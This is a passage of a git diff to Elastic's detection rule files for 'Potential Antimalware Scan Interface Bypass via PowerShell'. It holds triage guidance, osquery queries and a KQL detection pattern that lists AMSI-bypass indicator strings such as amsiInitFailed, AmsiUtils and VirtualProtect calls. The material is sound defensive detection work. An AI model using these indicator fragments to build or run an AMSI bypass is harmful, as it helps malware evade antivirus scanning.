Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json index c03f9f460a1..c491f33685a 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json index 9365f384dce..ef789d84bc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:process and host.os.type:windows and \npowershell.file.script_block_text : (\n AmsiInitialize or \n AmsiX32 or \n AmsiX64 or \n AntimalwareProvider or \n Bypass.AMSI or \n FindAmsiFun or \n Invoke-AmsiBypass or \n System.Management.Automation.AmsiUtils or \n System.Management.Automation.ScriptBlock or \n amsi.dll or \n amsiContext or \n amsiInitFailed or \n amsiSession or \n unloadobfuscated or \n unloadsilent or \n VirtualProtect and \"[System.Runtime.InteropServices.Marshal]::Copy\" or \n \".SetValue(\" and \"[Ref].Assembly.GetType(('System.Management.Automation\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json index 3b8e31095b6..e05cc2e44af 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and 